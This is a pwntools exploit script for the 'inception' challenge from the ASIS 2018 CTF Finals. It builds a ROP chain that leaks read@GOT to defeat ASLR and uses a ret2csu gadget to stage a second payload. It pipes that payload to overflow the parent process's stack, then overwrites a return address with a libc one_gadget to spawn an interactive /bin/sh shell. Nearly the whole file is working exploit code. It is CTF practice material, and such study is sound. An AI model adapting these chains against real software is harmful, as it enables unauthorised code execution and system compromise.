ctfs/ASIS/2018/Finals/inception/exploit.py

#!/usr/bin/env python

from pwn import *

with context.quiet:
    p = process('./program', env = {'LD_PRELOAD': './libc-2.27.so'})

    # leak the read@GOT to de-randomize ASLR
    # write(1, read@GOT, 8)
    payload  = p64(0x400cf3) # pop rdi; ret;
    payload += p64(0x1)      # stdout
    payload += p64(0x400cf1) # pop rsi; pop r15; ret;
    payload += p64(0x602058) # read@GOT
    payload += p64(0x0)      # r15
    payload += p64(0x400890) # write@GOT

    '''
    400cd0:       4c 89 fa                mov    rdx,r15
    400cd3:       4c 89 f6                mov    rsi,r14
    400cd6:       44 89 ef                mov    edi,r13d
    400cd9:       41 ff 14 dc             call   QWORD PTR [r12+rbx*8]
    400cdd:       48 83 c3 01             add    rbx,0x1
    400ce1:       48 39 dd                cmp    rbp,rbx
    400ce4:       75 ea                   jne    400cd0 <fork@plt+0x3a0>
    400ce6:       48 83 c4 08             add    rsp,0x8
    400cea:       5b                      pop    rbx
    400ceb:       5d                      pop    rbp
    400cec:       41 5c                   pop    r12
    400cee:       41 5d                   pop    r13
    400cf0:       41 5e                   pop    r14
    400cf2:       41 5f                   pop    r15
    400cf4:       c3                      ret
    '''

    # read the second payload and put it in the .bss
    # read(fd, .bss, 0x80)
    payload += p64(0x400cea) # pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
    payload += p64(0x0)      # rbx = 0
    payload += p64(0x1)      # rbp = 1 (in order to pass the "add rbx, 0x1; cmp rbp, rbx")
    payload += p64(0x602058) # r12 == 0x602058 (read's GOT) in order to meet "r12 + rbx * 8 == 0x602058"
    payload += p64(0x0)      # r13 == rdi == fd == 0
    payload += p64(0x602200) # r14 == rsi == .bss address == 0x602200
    payload += p64(0x80)     # r15 == rdx == 0x80 (size)
    payload += p64(0x400cd0) # mov rdx, r15; mov rsi, r14; mov edi, r13d; call QWORD PTR [r12+rbx*8] ...
    payload += p64(0x0) * 7  # garbage until reach the ret

    # write the second payload to pipe which causes stack overflow in the paret process
    # write(pipe_fd, .bss, 0x80)
    payload += p64(0x400cf3) # pop rdi; ret;
    payload += p64(0x6)      # pipe_fd
    payload += p64(0x400cf1) # pop rsi; pop r15; ret;
    payload += p64(0x602200) # read@GOT
    payload += p64(0x0)      # r15
    payload += p64(0x400890) # write@GOT

    # overwrite return address of child process
    p.send('ASIS{N0T_R34LLY_4_FL4G}\x00' + '\x00' * 16 + payload)

    p.recvuntil('something: Yeah tha')

    # find the libc base using the leaked read@GOT
    libc_base = u64(p.recv(8)) - 0x110070
    print 'libc base: {}'.format(hex(libc_base))

    '''
    0x4f322	execve("/bin/sh", rsp+0x40, environ)
    constraints:
        [rsp+0x40] == NULL
    '''
    one_gadget = libc_base + 0x4f322
    print 'one gadget: {}'.format(hex(one_gadget))

    # overwrite the return address in the parent process
    p.sendline('TRANSMISSION_OVER\x00' + '\x00' * 22 + p64(one_gadget))

    p.interactive()